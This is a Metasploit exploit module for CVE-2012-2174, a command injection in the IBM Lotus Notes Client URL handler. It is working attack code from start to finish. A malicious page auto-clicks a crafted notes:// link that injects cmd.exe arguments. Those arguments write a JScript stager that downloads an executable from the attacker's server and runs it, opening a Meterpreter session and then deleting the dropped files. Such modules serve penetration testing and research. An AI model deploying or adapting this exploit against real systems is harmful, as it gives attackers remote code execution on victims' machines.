IBM Lotus Notes Client URL Handler Command Injection



##

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper

    def initialize(info={})
        super(update_info(info,
            'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
            'Description'    => %q{
                    This modules exploits a command injection vulnerability in the URL handler for
                for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
                an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
                arguments. This module has been tested successfully on Windows XP SP3 with IE8,
                Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Moritz Jodeit', # Vulnerability discovery
                    'Sean de Regge', # Vulnerability analysis
                    'juan vazquez' # Metasploit
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-2174' ],
                    [ 'OSVDB', '83063' ],
                    [ 'BID', '54070' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
                    [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
                    [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
                ],
            'Payload'        =>
                {
                    'Space'           => 2048,
                    'StackAdjustment' => -3500
                },
            'DefaultOptions'  =>
                {
                    'EXITFUNC'         => "none",
                    'InitialAutoRunScript' => 'migrate -k -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', {} ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jun 18 2012",
            'DefaultTarget'  => 0))

        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)
    end

    def exploit
        @exe_name = rand_text_alpha(2) + ".exe"
        @stage_name = rand_text_alpha(2) + ".js"
        super
    end

    def on_new_session(session)
        if session.type == "meterpreter"
            session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
        end

        @dropped_files.delete_if do |file|
            win_file = file.gsub("/", "\\\\")
            if session.type == "meterpreter"
                begin
                    wintemp = session.fs.file.expand_path("%TEMP%")
                    win_file = "#{wintemp}\\#{win_file}"
                    # Meterpreter should do this automatically as part of
                    # fs.file.rm().  Until that has been implemented, remove the
                    # read-only flag with a command.
                    session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
                    session.fs.file.rm(win_file)
                    print_good("Deleted #{file}")
                    true
                rescue ::Rex::Post::Meterpreter::RequestError
                    print_error("Failed to delete #{win_file}")
                    false
                end

            end
        end

    end

    def on_request_uri(cli, request)

        if request.uri =~ /\.exe$/
            return if ((p=regenerate_payload(cli))==nil)
            register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
            register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
            data = generate_payload_exe({:code=>p.encoded})
            print_status("Sending payload")
            send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
            return
        end

        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        if datastore['SSL']
            schema = "https"
        else
            schema = "http"
        end
        uri = "#{schema}://#{my_host}"
        uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

        script = "var w=new ActiveXObject('wscript.shell');"
        script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
        script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
        script << "x.open('GET','#{uri}', false);"
        script << "x.send();"
        script << "var s=new ActiveXObject('ADODB.Stream');"
        script << "s.Mode=3;"
        script << "s.Type=1;"
        script << "s.Open();"
        script << "s.Write(x.responseBody);"
        script << "s.SaveToFile('#{@exe_name}',2);"
        script << "w.Run('#{@exe_name}');"

        vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"

        link_id = rand_text_alpha(5 + rand(5))

        js_click_link = %Q|
        function clickLink(link) {
            var cancelled = false;

            if (document.createEvent) {
                var event = document.createEvent("MouseEvents");
                event.initMouseEvent("click", true, true, window,
                    0, 0, 0, 0, 0,
                    false, false, false, false,
                    0, null);
                cancelled = !link.dispatchEvent(event);
            }
            else if (link.fireEvent) {
                cancelled = !link.fireEvent("onclick");
            }

            if (!cancelled) {
                window.location = link.href;
            }
        }
        |

        if datastore['OBFUSCATE']
            js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
            js_click_link.obfuscate
            js_click_link_fn = js_click_link.sym('clickLink')
        else
            js_click_link_fn = 'clickLink'
        end


        html = <<-EOS
        <html>
        <head>
        <script>
        #{js_click_link}
        </script>
        </head>
        <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
        <a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
        </body>
        </html>
        EOS

        print_status("Sending html")
        send_response(cli, html, {'Content-Type'=>'text/html'})

    end

end